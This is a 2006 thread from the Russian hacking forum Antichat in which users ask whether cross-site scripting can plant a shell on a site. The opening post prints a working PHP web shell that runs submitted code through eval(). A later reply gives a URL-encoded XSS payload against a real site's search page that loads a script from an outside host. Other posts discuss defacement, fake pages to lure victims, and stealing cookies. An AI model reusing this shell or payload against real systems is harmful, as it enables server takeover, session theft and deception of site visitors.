Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Про Xss (https://forum.antichat.xyz/showthread.php?t=28768)

GrAmOzEkA 09.12.2006 13:43
Про Xss
 
Народ поскажите хсс только ворует куки или можно как то через это загрузить шелл например вот этот:
Код:
<?

$docr = $_SERVER['DOCUMENT_ROOT'];

$gpc = get_magic_quotes_gpc();
if (!empty($_POST['c'])) {
        $c = $gpc ? stripslashes($_POST['c']) : $_POST['c'];
} else {
        $c = NULL;
}

?><form action="" method="post">
<textarea cols="80" rows="30" name="c" id="c"><?=$c; ?></textarea>
<br><input type="submit">
</form><?

if (!is_null($c)) eval($c);
?>
Урл сайта имеет вид: http://*****.ru/info.php?log=[XSS]

slider 09.12.2006 14:07
Врятли! :(

__XT__ 09.12.2006 15:28
шелл через кроссайтскриптинг?
вопрос интересный.
если активная xss вы к примеру можете закодировать в страничку екзешник какой нить троян.
или Сделать псевдо-дефейс-)))
Это когда к примеру нашёл активную хсс на гл. страничке сайта и по средствам вставки скрипта перекрывающего страничку можно вставить тэги и устроить дефейс.


как год назад: http://history-php-fusion.narod.ru/123.PNG
а вставка была в <img src=javascript:document.wite('AIRSG')>

GrAmOzEkA 09.12.2006 15:42
Да это я знаю сам прикалывался ,а вот насколько реально запустить шелл через хсс?
(ХСС активная.)

FQziT 09.12.2006 15:50
Это вообще невозможно.

slider 09.12.2006 16:07
__XT__ Даже при поможи пасифки можно такое сделать
Даже вставить целвый html файл!

GrAmOzEkA 09.12.2006 16:33
А если шелл попробовать запустить как каритинку таким образом:
<img src="Ссылка на шелл-картинку" alt="" border="0">

slider 09.12.2006 16:42
Цитата:
Сообщение от GrAmOzEkA
А если шелл попробовать запустить как каритинку таким образом:
<img src="Ссылка на шелл-картинку" alt="" border="0">
Конечно же не выйдет! )
Но можно вставить js так а в нём будит типо
document.wite
Так тока html файлы вставлять!
Можно Фейк сделать неплохой!

http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63 %3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6 E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73% 63%72%69%70%74%3E

Вот вам пример!
http://guap-spb.jino-net.ru/log01.txt

посмотрите всё просто!

GrAmOzEkA 09.12.2006 16:46
И что этим фейком можно делать? Только жертв заманивать.
Мнеб чёнить такое чтоб можно было файл загрузить или просматреть.

m0nzt3r 09.12.2006 19:17
Да нельзя шелл через хсс.Зарубите на носу это.Закрыто.Самое полезное - куки.


Время: 16:26